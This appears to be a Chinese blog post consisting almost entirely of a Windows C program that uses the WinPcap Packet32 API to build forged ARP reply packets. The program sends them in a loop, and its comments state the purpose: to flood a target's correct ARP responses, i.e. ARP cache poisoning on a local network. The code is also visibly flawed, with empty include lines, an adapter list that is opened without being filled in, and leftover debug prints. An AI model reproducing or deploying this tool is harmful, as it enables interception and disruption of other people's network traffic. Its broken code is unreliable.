程序如下:
#include
#include"packet32.h"
#include
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#pragma pack(push,1) //在定义结构的时候一顶要用到pack(push,1)和下面的pack(pop)
//否则你构造的结构的长度会有问题
typedef struct ehhdr //以太网头部,长度14
{
unsigned char eh_dst[6]; //目的的MAC地址
unsigned char eh_src[6]; //源的MAC地址
unsigned short eh_type; //帧类型
}EHHDR,*PEHDHR;
typedef struct arphdr //以太网arp字段长度28
{
unsigned short arp_hrd; //硬件类型
unsigned short arp_pro; //协议类型
unsigned char arp_hln; //硬件地址长度(6)
unsigned char arp_pln; //协议地址长度(4)
unsigned short arp_op; //回应还是请求
unsigned char arp_sha[6]; //发送者MAC地址
unsigned long arp_spa; //发送者IP
unsigned char arp_tha[6]; //接收者MAC地址
unsigned long arp_tpa; //接收者IP
}ARPHDR,*PARPHDR;
typedef struct ARPPACKET //整个ARP包的结构
{
EHHDR ehhdr;
ARPHDR arphdr;
}ARPPACKET,*PARPPACKET;
#pragma pack(pop)
int main()
{
ULONG AdapterLength;
char AdapterList[2][1024];
WCHAR AdapterName[8192];
char szPktBuf[256000];
ARPPACKET ARPPacket;
ARPPacket.ehhdr.eh_type=htons(0x0806);
ARPPacket.arphdr.arp_hrd=htons(0x0001);
ARPPacket.arphdr.arp_pro=htons(0x800);
ARPPacket.ehhdr.eh_dst[0]=0xaa;
ARPPacket.ehhdr.eh_dst[1]=0xaa;
ARPPacket.ehhdr.eh_dst[2]=0xaa;
ARPPacket.ehhdr.eh_dst[3]=0xaa;
ARPPacket.ehhdr.eh_dst[4]=0xaa;
ARPPacket.ehhdr.eh_dst[5]=0xaa;
ARPPacket.ehhdr.eh_src[0]=0xCC;
ARPPacket.ehhdr.eh_src[1]=0xCC;
ARPPacket.ehhdr.eh_src[2]=0xCC;
ARPPacket.ehhdr.eh_src[3]=0xCC;
ARPPacket.ehhdr.eh_src[4]=0xCC;
ARPPacket.ehhdr.eh_src[5]=0xCC;
ARPPacket.arphdr.arp_hln=6;
ARPPacket.arphdr.arp_pln=4;
ARPPacket.arphdr.arp_op=htons(0x0002);
ARPPacket.arphdr.arp_sha[0]=0xCC;
ARPPacket.arphdr.arp_sha[1]=0xCC;
ARPPacket.arphdr.arp_sha[2]=0xCC;
ARPPacket.arphdr.arp_sha[3]=0xCC;
ARPPacket.arphdr.arp_sha[4]=0xCC;
ARPPacket.arphdr.arp_sha[5]=0xCC;
ARPPacket.arphdr.arp_tha[0]=0xAA;
ARPPacket.arphdr.arp_tha[1]=0xAA;
ARPPacket.arphdr.arp_tha[2]=0xAA;
ARPPacket.arphdr.arp_tha[3]=0xAA;
ARPPacket.arphdr.arp_tha[4]=0xAA;
ARPPacket.arphdr.arp_tha[5]=0xAA;
ARPPacket.arphdr.arp_spa=inet_addr("192.168.0.2");
ARPPacket.arphdr.arp_tpa=inet_addr("192.168.0.1");
memcpy(szPktBuf,(char*)&ARPPacket,sizeof(ARPPacket));
//填充包
PacketGetAdapterNames((char*)AdapterName,&AdapterLength);
LPADAPTER lpAdapter=0;
lpAdapter=PacketOpenAdapter(AdapterList[0]);
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,szPktBuf,64);
printf("hello");
PacketSetNumWrites(lpAdapter,2);
printf("hello");
while(getchar()!='q') //当输入为q时结束
{
if(PacketSendPacket(lpAdapter,lpPacket,true)==false) //不断发送伪造信息,将目标的正确
//ARP REQUEST淹没
{
printf("error in sending packet");
return -1;
}
}
printf("Send ok!");
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return 1;
//发送包
}
--------------------next---------------------
阅读(1241) | 评论(0) | 转发(0) |
